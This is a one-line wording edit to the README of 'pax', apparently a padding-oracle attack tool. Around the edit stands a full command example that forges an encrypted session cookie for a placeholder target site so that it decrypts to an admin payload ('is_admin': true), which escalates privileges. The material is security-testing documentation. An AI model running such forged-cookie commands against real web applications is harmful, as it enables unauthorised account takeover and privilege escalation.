liamg/pax/README.md

 It looks like you could elevate your privileges here!

-You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:
+You can attempt to do so by first generating your encrypted data that the oracle will decrypt back to some sneaky plaintext:

 ```bash
 pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'